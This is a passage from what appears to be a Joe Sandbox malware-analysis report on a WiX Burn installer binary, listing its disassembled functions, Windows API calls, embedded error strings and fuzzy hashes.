                                                                                                                                                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 702752599-259800149
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd4618fec39cde772e1fc0896acd708fe4c6bbb443831a853f2978cf6beb5332
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f112fc16e1854cb9e3cf57fb2380aeb8980b659c808d09c148a8f34ffc7e845
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4618fec39cde772e1fc0896acd708fe4c6bbb443831a853f2978cf6beb5332
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5571BE3990462ABBDB10CB94C995EAEBBB4FB05724F210254F921EB7C1D774AE11CB90
                                                                                                                                                                                                                                                                                                  Function 008746DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008746F3
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 00874714
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 0087471A
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,00000000,008AB518,?,00000000,00000000,008AB519,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008747A8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008747AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1233551569-452622383
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3ca10c7aab61159afeea0daf17939662b879c5a5ebe5bf357ffc0ad5bc319b1b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ee05053cde98cbea381d25fd9f508c5e8cc33378e5198ec7a82290d6eaac636
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca10c7aab61159afeea0daf17939662b879c5a5ebe5bf357ffc0ad5bc319b1b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A51B536D4022AB7DB219A984C46FAF7668FB01B60F119175FE24FB281D774DD0096E2
                                                                                                                                                                                                                                                                                                  Function 008827FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1911311241
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3490da66ec28566481263365c4ef45d1814a1041d0352dd6193153ac0700d70c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ebc4d899811eef94c14dbb2f8714e7bbee2f39edc439f8725888af84588c7cad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3490da66ec28566481263365c4ef45d1814a1041d0352dd6193153ac0700d70c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6641B671E88727B6DA3575688C42FBAB658FB15B30F200321F934F63C5DBA899019392
                                                                                                                                                                                                                                                                                                  Function 00868F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,56008ADB,00000001,?,00869946,?,00000000,00000000,?,?,0086992E,?,?,00000000,?), ref: 00868FB2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • condition.cpp, xrefs: 00869084, 0086914E, 008691CA, 0086922E, 0086936C, 008693B0, 008693F4
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00869098
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 008693C4
                                                                                                                                                                                                                                                                                                  • -, xrefs: 00869118
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00869380
                                                                                                                                                                                                                                                                                                  • AND, xrefs: 008692BC
                                                                                                                                                                                                                                                                                                  • Failed to set symbol value., xrefs: 00869060
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00869242
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00869408
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00869162
                                                                                                                                                                                                                                                                                                  • NOT, xrefs: 008692DB
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 008691DE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                                                                                                                                                  • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4177115715-3594736606
                                                                                                                                                                                                                                                                                                  • Opcode ID: d22577dc6b422831cb0c38ecfb11b4d1077501874b0905b2f331839d85ffcd6e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e54a20c0e2034f6fd0df72fa4f48ca94e669fe908fd47b4383b21e496d479766
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d22577dc6b422831cb0c38ecfb11b4d1077501874b0905b2f331839d85ffcd6e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F11171600305FFEB248F58C889BBA7BACFB05704F114146F995DAAC5CBB5DA92CB84
                                                                                                                                                                                                                                                                                                  Function 00881BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00881CB8
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00881CD6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                                                                                                                                                                  • API String ID: 2664528157-1714101571
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef0c86256e78ee790fd9837e75667611f605b48b10e3ae15be081593bef46715
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0779c433fb38e513ee831a08a70ac7a600b2158fb826439cad443a994a80bed0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0c86256e78ee790fd9837e75667611f605b48b10e3ae15be081593bef46715
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E61A331A4421ABBDF10AB94CC45FAEBBA9FF41720F204255F421EB391DBB49E41D791
                                                                                                                                                                                                                                                                                                  Function 00876BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0086D4C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4DB
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,008757BD,?,00000000,00000000), ref: 00876E34
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00864522,?,008AB500,?,00864846,?,?), ref: 00876E43
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00864522,?,008AB500,?,00864846,?,?), ref: 00876EA0
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00876F92
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00876F9B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00876FB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0088BD0A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to cache engine to working directory., xrefs: 00876D71
                                                                                                                                                                                                                                                                                                  • UX aborted apply begin., xrefs: 00876C94
                                                                                                                                                                                                                                                                                                  • Failed to create cache thread., xrefs: 00876E71
                                                                                                                                                                                                                                                                                                  • core.cpp, xrefs: 00876C8A, 00876E67
                                                                                                                                                                                                                                                                                                  • Failed to register bundle., xrefs: 00876DEE
                                                                                                                                                                                                                                                                                                  • Failed to elevate., xrefs: 00876D94
                                                                                                                                                                                                                                                                                                  • Another per-user setup is already executing., xrefs: 00876CD8
                                                                                                                                                                                                                                                                                                  • Engine cannot start apply because it is busy with another action., xrefs: 00876C28
                                                                                                                                                                                                                                                                                                  • Failed to set initial apply variables., xrefs: 00876D02
                                                                                                                                                                                                                                                                                                  • Another per-machine setup is already executing., xrefs: 00876DC8
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00876ECD, 00876EE7, 00876FB4
                                                                                                                                                                                                                                                                                                  • Failed while caching, aborting execution., xrefs: 00876E98
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                                                                                                                                                  • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2169948125-4292671789
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c3bda969b1c193f026f492eba210c2065cad66c4b3144e3c7fdbb395e9d3b81
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0821d3abcee71dd3ba050a06a585e3e1cfcc40a4c5b620d567bad8b93d60717
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c3bda969b1c193f026f492eba210c2065cad66c4b3144e3c7fdbb395e9d3b81
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AC1D472900A15ABDF219F54C885BEE3AA8FF04714F148179FD0DEE24AEB74D950CBA1
                                                                                                                                                                                                                                                                                                  Function 008A8134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 008A8161
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 008A817C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008A821F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,008AB518,00000000), ref: 008A825E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008A82B1
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,008AB518,000000FF,true,000000FF), ref: 008A82CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008A8307
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 008A844B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3037633208
                                                                                                                                                                                                                                                                                                  • Opcode ID: dd3e7b3b88d3a07824564b8a57d66befc84d8a37a8bf279a5362b8906695ed0b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 539e27269eaf5f40c27651eb26537492f3a0232592d13483a6fd7e06337b4d48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd3e7b3b88d3a07824564b8a57d66befc84d8a37a8bf279a5362b8906695ed0b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DB19131604606EBEB209F58CC81F5A7BB6FB46730F214659F925EBAD1DB74E840CB24
                                                                                                                                                                                                                                                                                                  Function 008A77F7 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 008A7857
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 008A787C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 008A789C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008A78CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008A78EB
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7916
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A798D
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A79D9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 318886736-3944986760
                                                                                                                                                                                                                                                                                                  • Opcode ID: c066021c7137879c32fe8ab9cd8a6b1a9eb12bb925e29102c37fda1f8464d4a1
                                                                                                                                                                                                                                                                                                  • Instruction ID: ff012e365ef37b92981c7150a08082dd6cee3714c1b8788df216f0696c6e4906
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c066021c7137879c32fe8ab9cd8a6b1a9eb12bb925e29102c37fda1f8464d4a1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE613171904219BBEF11DB94CC45FAEBBB8FF06320F240265E521E6991D7349E10EB50
                                                                                                                                                                                                                                                                                                  Function 0087E3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087E2AF: LoadBitmapW.USER32(?,00000001), ref: 0087E2E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087E2AF: GetLastError.KERNEL32 ref: 0087E2F1
                                                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0087E429
                                                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0087E43D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E448
                                                                                                                                                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0087E54D
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0087E55C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 164797020-2188509422
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7961d37945527f5b4ad1f8c7f39aad510fa6f659fb605ed84a4b8cbe117233b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a7257771325ee3a7a6e338635888b3851fea3cef8e70acf3dd71942d29561ad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7961d37945527f5b4ad1f8c7f39aad510fa6f659fb605ed84a4b8cbe117233b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E41C272900619BFEB119BE4DC09AAEBBB8FF09714F104165FA08F6251E774DD00CBA1
                                                                                                                                                                                                                                                                                                  Function 00889DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0088BC85,00000001), ref: 00889E46
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088BC85,00000001), ref: 00889FB6
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,0088BC85,00000001), ref: 00889FF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088BC85,00000001), ref: 0088A000
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to execute MSP package., xrefs: 00889ECB
                                                                                                                                                                                                                                                                                                  • Invalid execute action., xrefs: 0088A056
                                                                                                                                                                                                                                                                                                  • Failed to execute dependency action., xrefs: 00889F36
                                                                                                                                                                                                                                                                                                  • Failed to execute EXE package., xrefs: 00889E7D
                                                                                                                                                                                                                                                                                                  • Failed to execute MSI package., xrefs: 00889EA6
                                                                                                                                                                                                                                                                                                  • Failed to load compatible package on per-machine package., xrefs: 00889F5C
                                                                                                                                                                                                                                                                                                  • Cache thread exited unexpectedly., xrefs: 0088A047
                                                                                                                                                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 00889F17
                                                                                                                                                                                                                                                                                                  • Failed to execute compatible package action., xrefs: 00889F73
